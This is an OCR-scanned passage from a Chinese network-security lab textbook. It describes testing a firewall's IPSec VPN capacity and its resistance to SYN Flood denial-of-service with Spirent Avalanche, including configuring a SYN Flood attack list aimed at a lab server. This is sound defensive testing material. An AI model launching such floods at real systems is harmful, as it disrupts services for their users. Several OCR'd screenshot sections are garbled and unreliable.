Phase 1 Phase 2 Digtal Certificate 
C Encrypt Packet 3 Transform: ESP | Re-key Threshold (sec): 30 Certificate File: [CERT I 
Re-connect Time (sec):| 20. [Use Commit Bit | SalD Lifetime (sec): [28800 Private Key File: | SIGNATURE | 
IKE Lifetime (sec): [28800 Re-Key Timer (sec): [0 CA Certs [cacERT jm 
|Phase 2 Policies _ 
Enabled | Tunnel Option | PFS | Hash | Encryption. Í Dest Subnet | | Dest Mask 
n | One per Subnet |GrupMoDP78)| Ws | EsPDS | 1921681000 | /24 


图 18-50 IPSec 阶段 一 、 阶 段 二 参数 


(12) 参考 上 一 个 实验 ， 将 上 述 客户 端的 逻辑 参数 和 Avalanche 物理 端口 进行 绑 定 ， 
到 此 为 止 完成 客户 端 IPSec 的 相关 配置 。 

(13) 由 于 IPSec VPN 隧道 终结 于 被 测 防 火 墙 ， 因 此 模拟 的 服务 器 不 需要 做 任何 关于 
IPSec 方面 的 配置 ， 只 需要 按照 普通 的 HTTP 服务 器 进行 配置 即 可 ， 详 细 配 置 请 参考 上 
-实验 。 

(14) 单 击 软件 上 方 的 Run 按钮 ， 在 运行 界面 下 ， 单 击 Client Stats 从 客户 端 方向 观 
$t IPSec 隧道 建立 的 情况 ， 如 图 18-51 所 示 。 


Detais | Summary | Load | HTTP | Streaming | Multicast | FTP | POPS | SMTP | ONS | Telnet | TCP | DDOS | CRJUDP | CR/TCP | Network | Resource | PPP | 
| PPeJPPPoE Table | TCPStaks | Smusers | Fairness | TP3ec | IP | 802.1XIRADIUS | MM | Tmers | QoE | IMAPA | CIFSNG | RTMP | RTMPT | VOAStreams | Sapee | SIPNG | ThreatEx | 


Mina 
176/176... 
118/118). 


图 18-51 实时 测试 结果 


【实验 报告 | 
等 待 运行 结束 , 通过 Avalanche Analyzer 软件 观察 测试 的 最 终结 果 , 如 图 18-52 所 示 ， 
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从 结果 中 可 以 看 到 该 防火 墙 的 IPSec 的 性 能 。 在 测试 过 程 中 ， 发 起 了 593 次 IPSec 建立 
连接 请 求 ， 实 际 成 功 建立 的 IPSec VPN 的 数目 为 586 个 ， 其 中 有 7 个 失败 。 


Fia Tode Pago Web 


图 18-52 最 终 测 试 结果 


【思考 题 】 
(1) IPSec 有 哪儿 种 工作 模式 ? 
(2) 什么 因素 会 影响 到 防火 墙 的 IPSec 性 能 指标 ? 


18.3.4 防火墙 抗 拒绝 服务 攻击 能 力 测试 


【实验 目的 】 

按照 RFC3511 的 要 求 ， 测 试 拒绝 服务 攻击 对 防火 墙 的 TCP 连接 建立 和 (或 ) HTTP 
传输 速率 的 影响 ， 必 须 在 最 大 TCP 连接 速率 和 或) HTTP 传输 速率 的 测试 获得 基准 测 
试 结果 之 后 进行 。 


【原理 简介 】 

SYN Flood 是 当前 最 流行 的 DoS〈 拒 绝 服务 ) 攻击 与 DDoS 〈 分 布 式 拒绝 服务 ) 攻 
击 方式 之 一 ， 这 是 一 种 利用 TCP 设计 缺陷 ， 发 送 大 量 伪造 的 TCP 连接 请 求 ， 从 而 使 得 
被 攻击 方 资源 耗 尽 〈CPU 满 负荷 或 内 存 不 足 ) 的 攻击 方式 。 

正常 的 TCP 连接 通过 三 次 握手 协议 的 方式 建立 ， 客 户 端 发 送 包 含 SYN 标志 的 TCP 
报 文 ， 服 务 器 在 收 到 客户 端的 SYN 报 文 后 ， 将 返回 一 个 SYN+ACK 的 报 文 ， 表 示 客 户 
端的 请 求 被 接受 ， 客 户 端 也 返回 一 个 确认 报 文 ACK 给 服务 器 端 ， 到 此 一 个 TCP 连接 建 
立 完成 。 

SYN Flood 攻击 就 是 利用 TCP 连接 的 三 次 握手 协议 缺陷 来 实现 ， 如 图 18-53 所 示 。 
假设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 突然 死机 或 掉 线 ， 那 么 服务 器 在 发 出 
SYN+ACK 应 答 报 文 后 无 法 收 到 客户 端的 ACK 报 文 〈 即 第 三 次 握手 无 法 完成 )， 这 种 情 
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况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN+ACK 给 客户 端 ) 并 在 等 待 一 段 时 间 后 才 丢 弃 
这 个 未 完成 的 连接 ， 这 段 时 间 的 长 度 称 为 SYN Timeout。 一 般 来 说 ， 这 个 时 间 是 分 钟 的 
数量 级 (30s~2min)。 一 个 用 户 出 现 异常 导致 服务 器 的 一 个 线程 等 待 Imin 并 不 是 什么 很 
大 的 问题 ， 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 ， 服 务 器 端 将 会 为 了 维护 一 个 
非常 大 的 半 连 接 列表 而 消耗 非常 多 的 资源 ， 即 使 是 简单 地 保存 并 遍历 这 个 半 连 接 列表 也 
会 消耗 非常 多 的 CPU 时 间 和 内 存 ， 何 况 还 要 不 断 对 这 个 列表 中 的 IP 进行 SYN+ACK 重 
试 。 实际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ,最 后 的 结果 往往 是 堆栈 溢出 崩溃 。 而 即使 
服务 器 端的 系统 足够 强大 , 服务 器 端 也 将 忙于 处 理 攻击 者 伪造 的 TCP EB RTT JE IRURE 
竖 客 户 的 正常 请 求 (毕竟 客户 端的 正常 请 求 比率 
非常 小 )， 此 时 从 正常 客户 的 角度 看 来 ， 服 务 器 一 au 
失去 响应 ， 这 种 情况 称 做 服务 器 端 受到 了 SYN aN SS 

——— NACK _ 

Ait __, 

4— ——ÀRYNACK 一 


Flood 攻击 (SYN 潜水 攻击 )。 
测试 仪 发 送 HTTP 流量 的 同时 ， 发 送 TCP 
SYN Flood 攻击 数据 流 ， 查 看 测试 结果 。 比 较 该 
结果 , 看 TCP SYN Flood 攻击 是 否 影响 防火 墙 对 
正常 数据 流 的 转发 。 
【实验 环境 】 
使 用 Avalanche/Reflector 进行 防火 墙 测 试 的 网 络 连 接 拓 扑 图 及 地 址 配置 如 图 18-54 
所 示 。 


图 18-53 SYN Flood 攻击 原理 


内 网 接口 地 址 : 外 网 接口 地 址 : 


192.168.41.1/24 192.168.43.1/24 
Avalanche 模 拟 客户 机 Reflector 模 拟 服务 器 
valanche 被 测 防火 墙 etlector; 


图 18-54 ”使 用 Avalanche/Reflector 进行 防火 墙 测试 的 网 络 连接 拓扑 图 及 地 址 配置 


【实验 步骤 】 

(1) 连接 Avalanche 机 箱 〈 与 18.3.2 节 相同 )。 

(2) 建立 新 的 测试 方案 (与 18.3.2 节 相同 )。 

(3) 建立 新 的 测试 项 。 

@ 选择 File[INew|Test， 弹 出 New Test 窗口 。 

© 第 1 步 ,选择 方案 名 , 单 击 Next 按钮 。 28 2 步 ， 输 入 测试 名 字 , Pili Next 按钮 。 
第 3 步 ， 选 择 Device-Avalanche emulates both clients and servers, i; Next 按钮 。 第 4 
步 ， 选 择 Advanced， 单 击 Finish 按钮 。 

(4) 配置 正常 流量 CHTTP 流量 )。 

(D) 选择 ClientlActions 标签 ， 设 置 HTTP 请 求 URL 为 : 


1 get http://192.168.43.10 
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© 选择 Client|Subnets 标签 , 设置 模拟 客户 端的 IP 地 址 范围 、 网 络 地 址 及 网 关 地 址 。 

e IPAddress (Range): 192.168.41.20~192.168.41.200. 

e Netmask: /24. 

e Gateway Address: 192.168.41.1. 

© 选择 Client|Ports 选项 卡 ， 添 加 模拟 客户 端的 Avalanche 端口 。 

@ 选择 Client|Associations 选项 卡 ， 添 加 新 的 关联 项 ， 将 第 (D ~ GB) 步 的 设置 关 

© 选择 Server|Profiles 选项 卡 ， 选 择 服务 器 模拟 的 协议 类 型 为 HTTP. 

© 选择 Server|Transactions 选项 卡 ， 选 择 服务 器 模拟 的 HTTP 类 型 和 页 面 大 小 。 

@ 选择 Server|Subnets 选项 卡 ， 设 置 模拟 服务 器 的 网 络 地 址 及 网 关 地 址 。 

e Netmask: /24。 

e Network: 192.168.43.0。 

e Gateway Address: 192.168.43.1. 

选择 Server|Ports 选项 卡 ， 添 加 模拟 服务 器 的 Avalanche 端口 。 

© 选择 Server|Associations 选项 卡 ， 添 加 新 的 关联 项 ， 将 第 (5) ~ (8) 步 的 设置 关 
联 起 来 。 

选择 Client|Loads 选项 卡 , 修改 默认 配置 Default。 设 置 Specification 为 Connections/ 
second; 设置 负载 的 Height 为 在 18.3.2 节 中 测 得 的 最 大 TCP 连接 速率 的 值 。 

G) 配置 拒绝 服务 (Dos) 攻击 流量 (TCP SYN Flood). 

© X&1f Client|Actions, Jit; New 按钮 创建 一 个 新 的 Actions List 名 称 为 SYN_Attack， 
如 图 18-55 所 示 。 


Client ` Server “C Content Files “Notes `C Run `C Results œ 
{Loads Actions “Profiles `C Network ` Subnets `C Ports `C Associations ò, 


Actions 、 
mum 
Actions [New] 


图 18-55 ”创建 新 的 攻击 Actions List 


© 在 Attack List 选 项 卡 下 ， 选 择 创建 新 的 Attack List， 命 名 为 SYN_Attack， 并 单 
idi OK 按钮 ， 进 入 Editor 攻击 配置 界面 ， 如 图 18-56 所 示 。 


‘Attack Lists “\ Content Fies ( Directores < CRICP © CRUDP CRETH *. Forms HTTP Content C, Phonebook, SaPEE Seard « p 
Example Action: [THREATEX://ATTACK_LST=LABEL Name [Cedtor... 


® Create New Attack List Pr... X 


seni — — —] 


cx ] (cancel 


New button at the bottom let corner. 


[5], at | 
图 18-56 输入 新 的 攻击 列表 名 称 
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@ 在 Attack List Editor 配置 窗口 下 进行 攻击 参数 的 设置 ， 在 本 测试 环境 下 参考 
图 18-57 进行 配置 ， 完 成 参数 配置 后 单 击 Save 按钮 进行 保存 并 关闭 本 窗口 。 


dito m] 
a m [ ^ 
E GEL. 99 ley ^ 
12006)... [en ro KVE-L. Bel — 0060 
5 SET NE 
2008]... RE [1932 [1393 
7 7221 
Attempt f m 
hatp format- xmi HTTP Format String GET Request Stateful 2006)... [HTTP] [Crash...VE-2... 7111 975 
Request for Microsoft Ba... pa m 1 
hap_get_nkxml HTTP Request for Microsoft Sh... Stateful 2006/... [HTTP] [Infec.. I 
CHP Ping Scan (ECHO request) i. [ICMP] [Denia..| i 
(IPvéOverIPvd. xml jpv6 Tunneled Through IPv4 — Raw — 2006/. | 
MS SQLS. Crash. 5310 
destMAC=00;90:fb:01:6F:53, Rosenttack xa Rose Attack Raw — 2006/... [IP] | B431 
re "Rose Attack Food Variant 2 Raw a 
destPort-0 RST Fad | 
wakTimeout=200 -— 
aw zm 
State Flood hu E | 1 | 
I7 .TCP fran xmi. JICP FRAG Attack i». — "nns Tpl Dena | I RÀ 
[attack SYNE Lod. xal a] 
Short Description 
TCP SYN Flood 


图 18-57 攻击 列表 及 相关 参数 配置 


目的 IP: destIP = 192.168.43.10. 
目的 端口 ，destPort=80。 
超时 时 间 : waitTimeout=200。 
@ 如 图 18-58 所 示 ， 在 Client|Actions 选项 卡 的 Actions List 下 面 需要 添加 一 条 攻击 
的 动作 : 
THREATEX:WATTACK _ LIST=SYN _Attack (此 处 对 大 小 写 及 空格 敏感 ， 输 入 的 时 候 
Client `C Server `C Content Files “\ Notes C Run“ Results 


[Loads] Actions `C profiles `C Network (Subnets `C Ports". Associations \、 
Actions. 


Select an Actions List to Edt: [satak [| &3 ][ ah ][ & )[ & 


Actions 


10 0 30 
THREATEX: //ATTACK_LIST=SYN_At tack 


图 18-58 用户 端 模拟 攻击 的 Actions 


© 在 Client|Loads 下 进行 攻击 负载 的 创建 ， 如 图 18-59 所 示 进 行 负载 的 设计 ， 保 证 
当 作 为 背景 的 HTTP 流量 稳定 后 〈 约 60s) 开始 进行 SYN Flood 攻击 ， 从 而 可 以 观察 到 
攻击 对 于 实际 用 户 流量 的 影响 。 

© 在 Associations 中 进行 参数 的 关联 配置 ， 其 中 HTTP. 背景 流量 和 攻击 流量 需要 分 
别 使 用 不 同 的 负载 配置 ， 在 Associations 选项 卡 下 负载 类 型 应 该 选择 User Based. HT 
SYN Flood 攻击 是 单 向 的 ， 所 以 并 不 需要 在 仪表 模拟 的 服务 器 端 做 任何 的 配置 ， 如 
图 18-60 所 示 。 


328 


$183 ”网络 安全 测试 仪器 


Clent ^ Server “\ Content Files Notes “\ Run ^ Results 


J Loads “actions `C Profiles `C Network \ Subnets `C Ports `C Associations 


Select aloadtoedt: [Tar M 6) aJ) a 


General 

Specification Connections/second vw. Total Duration O hrs. 1 min. 45 sec. 0 ms. 
Defadk Tine Scale | Seconds M| | Phase Edtor Tme Scales 
randon ees Load conaran 
Phase Editor Desired Load in Connections/second 

Label Delay 3 

Pattern Flat 

Time Scale Default * 

Height 0 

Ramp Tme 0 sec. 

Steady Time. 60 sec. 

i 

Duration 60 sec. isd 
[O Enable Protocol Exclusion 


Excluded Protocols 


o o 28.2 ss 78.8 105 


Seconds 


图 18-59 攻击 流量 的 负载 配置 


| Client ~ Server `£ Content Files Y. Notes < Run Y. Results ` 
[loads \C actions `C Profiles ~C Network Subnets XC Ports ) Associations 


Load Profile Type: | © User Based | O Global 


HTTP. Client (Pv4) 
Ww Jon Jm JL T Jane Jem Ca | Cine cn 
ay 
| 
| 410, 
o 18 35 52 3 


Minutes 


图 18-60 基于 用 户 的 负载 关联 


329 


网 络 安全 实验 教程 (第 2 版 ) 


(6) 运行 测试 ， 查 看 测试 结果 ， 图 18-61 所 示 的 是 防火 墙 对 含有 SYN Flood 攻击 的 
网 络 流量 响应 ， 当 防火 墙 意 识 到 受到 攻击 之 后 ， 马 上 阻塞 掉 外 界 流量 的 连接 请 求 ， 使 得 
网 络 的 进 / 出 两 个 方向 上 的 流量 以 及 流量 包 速 率 大 幅度 下 降 。 在 攻击 解除 后 ， 流 量 才 逐 渐 
恢复 正常 。 


Network traffic (kbps) 


10000} 


oo! s * ‘ + " + 
00:00:40 00:01:00 — 00:01:20 — 00-01-40 — 00:02:00 00:02:20 


Packet traffic / second 
13000 
9000 

— Incoming 

5000 — Outgoing 


10004 ] > ` - - ] 
00:00:40 0001.00 00:01:20 — 0001.40 00.0200 00:02:20 


一 外 一 一 
SPIRENT 


图 18-61 攻击 对 用 户 HTTP 流量 的 影响 


最 大 TCP 连接 速率 


HTTP 流量 中 没有 TCP SYN Flood 攻击 


HTTP 流量 中 带 有 TCP SYN Flood 攻击 


记录 当 攻 击 撤销 后 背景 HTTP 流量 过 多 长 时 间 能 恢复 到 受 攻击 前 的 水 平 。 


【思考 题 】 
(1) 阐述 测试 防火 墙 的 拒绝 服务 处 理 能 力 的 测试 原理 。 
(2) 简 述 如 何 使 用 Avalanche 测试 防火 墙 处 理 拒绝 服务 攻击 的 能 
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